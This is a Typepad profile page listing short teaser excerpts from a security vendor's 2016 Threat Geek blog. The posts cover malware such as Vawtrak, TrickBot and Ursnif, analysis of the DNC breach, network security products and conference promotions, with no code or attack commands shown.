This is ThreatGeek's Typepad Profile.
Join Typepad and start following ThreatGeek's activity
Join Now!
Already a member? Sign In
Recent Activity
Security got the boring end of the stick when names for the generations were handed out. Instead of Millennials, Gen X, Baby Boomers or the Greatest Generation, we're stuck with "Next Gen." What comes after "Next Gen"? And where were the creative minds hiding when we needed them most? In this post, I’m going to focus on a sliver of the next-gen security stack that we get asked about every day. Specifically, where do next-gen firewalls stop and where do next-gen IPSs pick up the baton. But first, to understand next-gen security we need to take a quick trip down... Continue reading
Posted Dec 1, 2016 at Threat Geek
There are two types of runners: long-distance runners and sprinters. Everything about them is different. Sprinters are built for power while marathoners are built for endurance. But what if you could break the mold and find all of those capabilities in a single athlete? Endpoint detection and response (EDR) tools have faced a similar conundrum. Vendors have historically forced users to choose between architectures that were optimized for one activity at the expense of others. In short, the choices have been: Optimize for Speed: These tools generally use a peer-to-peer architecture that enable endpoints to communicate with each other. The... Continue reading
Posted Nov 30, 2016 at Threat Geek
In Part 1 of this series we asked the question: Would you re-hire your IPS if you interviewed it today? But it’s not a totally fair question. Because, before you hire someone (or in this case buy something) it’s pretty obvious that you need a deep and thorough understanding of what the job entails. Otherwise, frustration, handwringing, and assorted HR crises will emerge. So, we pose this question to you: Can you even remember why you bought your IPS in the first place? It seems like a self-answering question for a product whose name, after all, is an Intrusion Prevention... Continue reading
Posted Nov 15, 2016 at Threat Geek
Vawtrak, a.k.a. Neverquest, has been a prominent trojan in the banking world and numerous researchers have reported their findings about this malware. In August 2016, we blogged about the addition of a DGA to the banking trojan known as Vawtrak. The actors behind Vawtrak reacted to this attention by adjusting their tactics - enough to warrant a change in their DGA implementation. On November 9, 2016 the Threat Research Team at Fidelis Cybersecurity noticed a Vawtrak sample that appeared to be using an updated implementation of the DGA routine. The sample we analyzed was delivered by using Hancitor embedded in... Continue reading
Posted Nov 12, 2016 at Threat Geek
Commodity Remote Access Trojans (RATs) -- which are designed, productized and sold to the casual and experienced hacker alike -- put powerful remote access capabilities into the hands of criminals. RATs, such as H-W0rm, njRAT, KilerRAT, DarkComet, Netwire, XtremeRAT, JSocket/AlienSpy/Adwind and others, hold special interest for the Threat Research Team at Fidelis Cybersecurity. We're constantly following, detecting and monitoring the lifecycle of these RATs as they appear, disappear and often reappear under a new moniker. There have been recent reports 1, 2 about a new version of one such commodity RAT, H-W0rm (Hworm), and the various campaigns it is being... Continue reading
Posted Nov 9, 2016 at Threat Geek
Metadata gathered from your network can be a powerful ally in the battle against cyberattacks. In fact, you can do seemingly impossible things with the right metadata. In Part 1, we explored how metadata can help you spot phishing emails, find man-in-the-middle attacks, locate weak encryption and more. In Part 2, we take a look at five more seemingly impossible tasks. If these examples sound interesting, watch the webinar I recently did with Hardik Modi, our VP of Threat Research: 3 Ways to Reduce Detection Time from Months to Minutes. Impossible Task #6. See lateral movement within the network. If... Continue reading
Posted Oct 31, 2016 at Threat Geek
Bloomberg reporter Jordan Robertson recently sat down with Fidelis Cybersecurity Senior VP Mike Buratowski to discuss the malware and other data that attackers used to pull off the breach of the Democratic National Committee’s (DNC) servers. By examining the clues the attackers left behind, Mike explains how it's possible to attribute the attacks to a specific group of nation-state actors. Listen to Bloomberg Technology’s Decrypted Podcast and get the full story. Want to learn more? Read our analysis of the DNC intrusion malware. Continue reading
Posted Oct 27, 2016 at Threat Geek
Network Intrusion Prevention Systems have been a mainstay of the network security stack for well over a decade. When they first entered the mainstream in the early 2000s, the iPhone hadn't been invented. We were still in the age of the PalmPilot (anyone remember using that stylus?). But, at the time, IPSs represented real innovation. They were a welcome departure from the classic firewall, which was limited by its primitive accept-and-deny rules that were inadequate for the more sophisticated attacks to come. IPSs were a breath of fresh air. They came with new detection languages, like Snort. They could operate... Continue reading
Posted Oct 26, 2016 at Threat Geek
Deception and crime go hand in hand. But knowing when you’re being deceived means you need to think like the bad guys and know what to look for. There are three elements of deception. To see these elements in action, we need look no further than a few notable cases -- including the alleged Russian state actors behind the DNC and DCCC breaches as they continue to dump documents intended to influence the upcoming U.S. election. Let’s take a look at the three elements of effective deception. 1. Plan and Prepare The key is to create a storyline that’s mostly... Continue reading
Posted Oct 25, 2016 at Threat Geek
Metadata is data that describes other data. And while it may not sound sexy, metadata gathered from your network can be a powerful ally in the battle against cyberattacks. Continue reading
Posted Oct 17, 2016 at Threat Geek
In November 2015, the Dyre banking trojan seemingly disappeared overnight surprising security researchers worldwide. Months later it was announced that Russian authorities had arrested most of the gang responsible for its operations. Prior to that, it was a relatively rare act for Russian authorities to take action in such matters. Since then, nothing has been heard from those actors but the speculation was that some of programmers and other elements of the criminal operation would be subsumed into other cybercriminal operations. In September 2016, Fidelis Cybersecurity was alerted to a new malware bot calling itself TrickBot that we believe has... Continue reading
Posted Oct 15, 2016 at Threat Geek
For several years now, the Vawtrak trojan has been targeting banking and financial institutions, most recently in Canada as reported last week. The Fidelis Threat Research team recently analyzed a new variant to Vawtrak using HTTPS for C2 communications. Given what we've seen previously with Vawtrak, simply switching to HTTPS is not a major update in terms of development -- but it does show that the threat actors are interested in protecting their C2 communications. Here are some significant updates to Vawtrak: The malware now includes a DGA. Interestingly, it utilizes a pseudorandom number generator (PRNG) used in Vawtrak's loader.... Continue reading
Posted Aug 16, 2016 at Threat Geek
Fidelis Cybersecurity is proud to support the Wall of Sheep (WoS) at Def Con 2016, but this Wall needs to come down. Over the past several years, it's been standing-room only for WoS participants. This year's event promises to be even more spectacular. For those who need background, the 'sheep' on this wall are users whose internet traffic reveals their credentials (user names and passwords) passed in the clear, for prying eyes to see. The exercise starts as users sign on to the conference’s free wireless network. A copy of that traffic is given to participants whose job is to... Continue reading
Posted Aug 2, 2016 at Threat Geek
Following news reports that the Democratic Congressional Campaign Committee (DCCC) was breached via a spoofed donation website, the ThreatConnect Research team and Fidelis Cybersecurity teamed up to collaborate and take a look at the associated domain to ferret out additional details on the activity. The initial indications from the DCCC breach suggest FANCY BEAR pawprints based on the following: First, the registrant - fisterboks@email[.]com - behind the spoofed domain actblues[.]com has registered three other domains, all of which have been linked to FANCY BEAR by German Intelligence (BfV). Second, the timing is consistent with an adversary reacting to heightened focus... Continue reading
Posted Aug 1, 2016 at Threat Geek
We're counting down the last few days to Black Hat USA 2016. As you pack your suitcase and map out your schedule, plan on joining a meetup, seeing a demo or hitting us up for swag at the Fidelis Networking Lounge (aka Booth #1116). We can’t promise unicorns and narwhals, but we will have cool t-shirts, pinball and comfy chairs. Here’s a quick rundown on where you can find us: TECHNOLOGY & FREEWARE: At Black Hat, we’re debuting no-cost tools to help the security community stop attacks and prevent data theft. New resources include the Barncat™ Intelligence Database, the ThreatScanner™... Continue reading
Posted Jul 28, 2016 at Threat Geek
In politics, getting the dirt on your adversary is nothing new. Candidates and campaigns have been trying to dig up dirt on each other since the dawn of democracy in Athens. More recently, we’ve seen everything from burgling party headquarters, to wiretaps, and campaign stalkers that record every word a candidate utters in public. Most of these methods were employed to obtain information on an opponent so the information could be “weaponized” into a “gotcha” moment during a speech or used as a campaign talking point to discredit the opposing party. But as we watch the DNC leak unfold, it... Continue reading
Posted Jul 26, 2016 at Threat Geek
Threat actors provide valuable clues when they compromise a new environment. But a single clue, such as a malware sample, seldom sheds the necessary light on an attack. Sniffing out the tools and tactics of attackers requires that you (or someone you know) has seen them before. Historical attack data can serve as a valuable resource for analysts by helping to identify and contextualize the adversary and rank the risk of an attack. Today, we are excited to make a new (and we think pretty interesting) database available to the security community at no cost. The Fidelis Barncat™ Intelligence Database... Continue reading
Posted Jul 21, 2016 at Threat Geek
One of our trusted partners from Poland, Exatel S.A., has discovered that a web browser developed by Maxthon, a company from China, has been collecting sensitive data from its users. The Maxthon browser has anywhere from .75-1% of the global browser market, and has been estimated to be 2-3% of China’s own domestic browser market. Total global user count is estimated to be in the hundreds of millions. You can read their full report here: English: Polish: Using the Fidelis Network solution, Exatel found that there was a periodic upload of encrypted content to China from the Maxthon... Continue reading
Posted Jul 13, 2016 at Threat Geek
With season two of Mr. Robot approaching, the storyline follows a hacker group that takes down an evil global corporation and collapses the financial market. Led by the mysterious Mr. Robot, the hackers use a variety of tricks to evade detection, and seem to cover their tracks at every turn. There are similarities shared by the show's hackers and real-life attackers. Hackers are human. Like the rest of us, they are creatures of habit, turning to familiar tools and techniques time and time again. As they hone their craft, attackers develop their skills and accumulate knowledge. And while they go... Continue reading
Posted Jul 12, 2016 at Threat Geek
We've recently observed a new crypter called Xenon used to deliver Locky, a strain of ransomware, and Ruckguv, a type of malware that can download and install other types of malware. Xenon employs a novel trick to bypass debuggers, which we’ll describe here along with the techniques it uses. We also provide a Python script to decrypt objects packed using Xenon and the Krypton crypter, which we believe is its predecessor. Delivering and monetizing malware involves a large chain of independent tools – exploit kits, traffic distribution systems, spambots and more. The crypter occupies a special place in this chain,... Continue reading
Posted Jun 28, 2016 at Threat Geek
Well Britain, you’ve done it. The referendum is over and it's time to start thinking ahead about how the UK will reconcile its new laws and regulations. I believe that the UK could be at the beginning of a cybersecurity Renaissance, and I’ll explain why. At this point, it is uncertain how long it will take the United Kingdom to fully leave the EU, although the plan is that there will be a two-year transition phase. The next step in the process, according to Article 50 of the Lisbon Treaty, is for the UK to notify the EU council, although... Continue reading
Posted Jun 24, 2016 at Threat Geek
The Security Consulting team here at Fidelis specializes in investigations of critical security incidents by advanced threat actors. Last week, after Guccifer 2.0 claimed responsibility for the intrusion into the Democratic National Committee’s (DNC) servers, we were provided with the malware samples from the CrowdStrike investigation. We performed an independent review of the malware and other data (filenames, file sizes, IP addresses) in order to validate and provide our perspective on the reporting done by CrowdStrike. This blog post provides a summary of our findings. Many of you may be following the recent news related to the compromise of the... Continue reading
Posted Jun 20, 2016 at Threat Geek
What can bad guys use to launch a ransomware attack, facilitate an email spamming platform, or ensure persistent access to an enterprise? Compiled malware and compromised credentials could work. But web shells provide an even more stealthy way to establish a beachhead and quietly hide on the network for future operations. Web shells are not a new tactic. But they have been used in a number of recent attacks. We saw them in the ransomware attack that hit MedStar, which operates hospitals and healthcare facilities throughout the Washington D.C. metro area. Web shells have also recently been uncovered on a... Continue reading
Posted Jun 14, 2016 at Threat Geek
One of the biggest challenges when you go shopping for new security tools is answering the inevitable question from finance: “What’s the value?” Determining the ROI of a new security product isn’t always an exact science. There are no hard and fast rules to follow – which is why generic ROI calculators should be avoided at all costs (pun intended). But why is it so hard? Why can’t vendors just wow you with the promise of savings of 100%? The science of security is a moving target. Much like snowflakes, every organization is unique – their existing infrastructure, the size... Continue reading
Posted Jun 9, 2016 at Threat Geek
Fidelis Cybersecurity has been investigating a new variant of Ursnif, a family of trojans that captures and reports information about user activity back to the attacker. We recently observed the variant distributed in phishing runs designed to appear as legitimate banking-related emails. On infected hosts, it attempts to perform webinjects to capture credentials for major U.S. banking sites, including Citibank, JPMorgan Chase, USAA and Capital One. Interestingly, it takes screenshots when victims visit a variety of Italian sites, such as Unicredit, Poste and Relax Banking. To evade detection, it also blocks access to a surprisingly large number of security-related websites.... Continue reading
Posted Jun 7, 2016 at Threat Geek